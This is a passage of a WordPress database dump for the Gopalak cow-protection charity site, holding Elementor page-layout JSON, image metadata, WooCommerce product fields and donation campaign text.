scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10711,1783,'_elementor_page_assets','a:0:{}'),(10714,1784,'_wp_attached_file','2022/10/cropped-logo1211.png'),(10715,1784,'_wp_attachment_context','site-icon'),(10716,1784,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:28:\"2022/10/cropped-logo1211.png\";s:8:\"filesize\";i:56411;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"cropped-logo1211-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32813;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"cropped-logo1211-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13750;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:28:\"cropped-logo1211-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35719;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:26:\"cropped-logo1211-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3592;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:28:\"cropped-logo1211-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8348;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:26:\"cropped-logo1211-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3497;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:26:\"cropped-logo1211-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3497;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:28:\"cropped-logo1211-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28664;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:28:\"cropped-logo1211-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18880;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:28:\"cropped-logo1211-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17234;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:26:\"cropped-logo1211-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2050;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10719,1786,'_edit_lock','1665741483:1'),(10720,1786,'_edit_last','1'),(10721,1786,'_donable','no'),(10722,1786,'wcdp-settings[0]','0'),(10723,1786,'wcdp-settings[1]',''),(10724,1786,'wcdp-settings[wcdp_fundraising_goal]','0'),(10725,1786,'wcdp-settings[wcdp_fundraising_end_date]',''),(10726,1786,'total_sales','1'),(10727,1786,'_tax_status','taxable'),(10728,1786,'_tax_class',''),(10729,1786,'_manage_stock','no'),(10730,1786,'_backorders','no'),(10731,1786,'_sold_individually','no'),(10732,1786,'_virtual','no'),(10733,1786,'_downloadable','no'),(10734,1786,'_download_limit','-1'),(10735,1786,'_download_expiry','-1'),(10736,1786,'_stock',NULL),(10737,1786,'_stock_status','instock'),(10738,1786,'_wc_average_rating','0'),(10739,1786,'_wc_review_count','0'),(10740,1786,'_product_version','7.0.0'),(10741,1786,'_ywpo_preorder','no'),(10742,1786,'_regular_price','21000'),(10743,1786,'_price','21000'),(10744,1786,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:2:\"90\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(10745,1786,'_wcfm_product_views','141'),(10746,1775,'_regular_price','21000'),(10747,1775,'_price','21000'),(10750,1790,'_edit_lock','1665987069:1'),(10751,1790,'_edit_last','1'),(10752,1790,'_thumbnail_id','1564'),(10753,1790,'_campaign_description','We are in need of food donations again. These community cows are eagerly awaiting their dinner every night. If you can donate tins of Aldi wet food or Cosco dry, both would be gratefully received. If easier an Aldi\'s gift card. Either Colyton or Castle Hill location. Or a monetary donation if easier. Ref - cattle food. Thank you for previous food donations.'),(10754,1790,'_campaign_goal','0'),(10755,1790,'_campaign_end_date','0'),(10756,1790,'_campaign_suggested_donations','a:0:{}'),(10757,1790,'_campaign_allow_custom_donations','1'),(10758,1792,'_edit_lock','1665748186:1'),(10759,1792,'_elementor_edit_mode','builder'),(10760,1792,'_elementor_template_type','wp-page'),(10761,1792,'_elementor_version','3.7.8'),(10762,1793,'_elementor_edit_mode','builder'),(10763,1793,'_elementor_template_type','wp-page'),(10764,1793,'_elementor_version','3.7.8'),(10765,1792,'_wp_page_template','default'),(10766,1792,'_elementor_data','[]'),(10767,1792,'_elementor_page_assets','a:0:{}'),(10768,1794,'_elementor_edit_mode','builder'),(10769,1794,'_elementor_template_type','wp-page'),(10770,1794,'_elementor_version','3.7.8'),(10771,1794,'_wp_page_template','default'),(10772,1794,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10773,1794,'_elementor_page_assets','a:0:{}'),(10774,1794,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(10776,1795,'_elementor_edit_mode','builder'),(10777,1795,'_elementor_template_type','wp-page'),(10778,1795,'_elementor_version','3.7.8'),(10779,1795,'_wp_page_template','default'),(10780,1795,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10781,1795,'_elementor_page_assets','a:0:{}'),(10782,1795,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(10784,1796,'_elementor_edit_mode','builder'),(10785,1796,'_elementor_template_type','wp-page'),(10786,1796,'_elementor_version','3.7.8'),(10787,1796,'_wp_page_template','default'),(10788,1796,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10789,1796,'_elementor_page_assets','a:0:{}'),(10790,1796,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(10797,1800,'_edit_lock','1665980811:1'),(10798,1800,'_edit_last','1'),(10799,1800,'_elementor_edit_mode','builder'),(10800,1800,'_elementor_template_type','wp-page'),(10801,1800,'_elementor_version','3.7.8'),(10802,1800,'_wp_page_template','frontpage.php'),(10803,1800,'_elementor_data','[]'),(10804,1800,'_elementor_page_assets','a:0:{}'),(10805,1800,'open_shop_disable_page_sidebar','on'),(10807,1802,'_edit_lock','1665981571:1'),(10808,1802,'_elementor_edit_mode','builder'),(10809,1802,'_edit_last','1'),(10810,1802,'_elementor_template_type','wp-page'),(10811,1802,'_elementor_version','3.7.8'),(10812,1802,'_wp_page_template','elementor_header_footer'),(10813,1802,'_elementor_data','[]'),(10814,1802,'_elementor_page_assets','a:0:{}'),(10816,1802,'open_shop_disable_page_sidebar','on'),(10817,1804,'_edit_lock','1679982130:1'),(10818,1804,'_elementor_edit_mode','builder'),(10819,1804,'_elementor_template_type','wp-page'),(10820,1804,'_elementor_version','3.7.8'),(10821,1804,'_edit_last','1'),(10822,1804,'_wp_page_template','elementor_canvas'),(10823,1804,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}